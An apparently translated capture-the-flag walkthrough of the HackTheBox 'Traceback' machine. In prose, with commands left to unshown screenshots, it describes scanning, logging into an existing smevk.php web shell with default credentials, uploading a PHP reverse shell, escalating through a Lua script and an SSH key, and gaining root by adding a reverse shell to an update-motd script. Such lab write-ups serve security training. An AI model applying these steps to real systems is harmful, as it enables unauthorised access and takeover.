1. HackTheBox. Passing Traceback. Backdoor, LUA, SSH (level easy)

14 May 2023 4 minutes Author: Lady Liberty

Learn more about Backdoor, LUA, SSH

First, let’s consider a Backdoor – a malicious program, and sometimes a loophole intentionally left in the code of a legitimate program, which provides access to the device for unauthorized actions. A backdoor is exactly what its name says (from the English back door – “backdoor”): it secretly lets an attacker into the system, granting administrator rights. Backdoors are related to official utilities for remote administration, but their functionality is usually wider. In addition to directly controlling processes at the system level and even Bios, backdoors can steal personal user data, download and send files over the network, open access for viruses and worms, connect to remote hosts, turn the computer into a “zombie”, making it part of a botnet, but all this is invisible.

Next up is LUA and SSH. LUA is a programming language based on scripts. It is called script. Used to create utility business logic. Belongs to multiparadigm.SSH is a protocol that uses a client-server model to authenticate remote systems and provide encryption of data that is exchanged within the framework of remote access. By default, the TCP-22 port is used for the protocol: on it, the server (host) waits for an incoming connection and, after receiving the command and performing authentication, organizes the launch of the client, opening the shell chosen by the user. If necessary, the user can change the port used. To create an SSH connection, the client must initiate a connection with the server, providing a secure connection and confirming its identity (the identity is checked against the previous records stored in the RSA file and the user’s personal data required for authentication. Connecting to the laboratory via VPN It is recommended not to connect from a work computer or from a host where there is important data for you, because you are entering a private network with people who know something about IT.

Recon

1.First of all, we scan open ports. Since it takes a long time to scan all ports with nmap, I will first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at 500 packets per second. Example command and result the scans are shown in Screenshot 1 and Screenshot 2.


Screenshot 1. An example of the (masscan) command.

Screenshot 2. An example of a scan result.

2. To get more detailed information about the services running on the ports, let’s run a scan with the -A option. (Screenshot 3. and Screenshot 4.)


Screenshot 3. Command example (with -A option).

Screenshot 4. An example of a scan result.

3. SSH service and web server are running on the host. When we go to the web server, we will not find anything except a message. (Screenshot 5.)

Screenshot 5. Link text.

4. But we pay attention to something interesting in the source code. (Screenshot 6.)


Screenshot 6. Interesting code content.

5.Search for this line in Google and go to this github page. (Screenshot 7. and Screenshot 8.)


Screenshot 7. Google search page.

Screenshot 8. The github page

Entry Point

1. Going through these files, we determine that the smevk.php file was uploaded to the server. (Screenshot 1.) After that, in the initial code on Github, we find the default credentials and log in. (Screenshot 2. and Screenshot 3.)

Screenshot 1. Authorization interface smevk.php.

 

Screenshot 2. Source code on github.

Screenshot 3. Unome custom server.
 
Screenshot 4. Shell command example.

2.In the next step, we will generate a PHP shell and launch the listner. (Screenshot 4. and Screenshot 5.)

 

Screenshot 5. Listoner in PHP.

3. Now let’s load the shell and turn to it. We get the meterpreter session. (Screenshot 6. and Screenshot 7.)


Screenshot 6. session meterpreter.

Screenshot 7. Loading shells.

USER

1.In the user’s home directory, we find files and a note to them.

2.You can also run a lua script on behalf of the sysadmin user. (Screenshot 2.)


Screenshot 2. Butt Iua script.

2.Start the shell. (Screenshot 3.) For convenience, let’s throw in an SSH key.


Screenshot 3. Creating an SSH key.

3. Let’s connect using closed and take the flag. (Screenshot 4.)


Screenshot 4. Password from the user.

ROOT

1. Let’s run the LinPEAS base list script. And in the report we will find interesting files for recording. (Screenshot 1. and Screenshot 2.)


Screenshot 1. An interesting group of files

Screenshot 2. LinPEAS base listing script.

 

2.So the /etc/update-motd.d/00-header file is executed every time an SSH connection is made. Let’s check with pspy. Let’s run this utility and connect via SSH. But we will immediately add the reverse shell to this file. (Screenshot 3. and Screenshot 4.)

Screenshot 3. FILE /etc/update-motd.d/00-header.

Screenshot 4. Reverse shell.

3. Now we will immediately connect and see the reverse connection to our host. (Screenshot 5.)

Screenshot 5. Obtaining root rights.
Found an error?
If you find an error, take a screenshot and send it to the bot.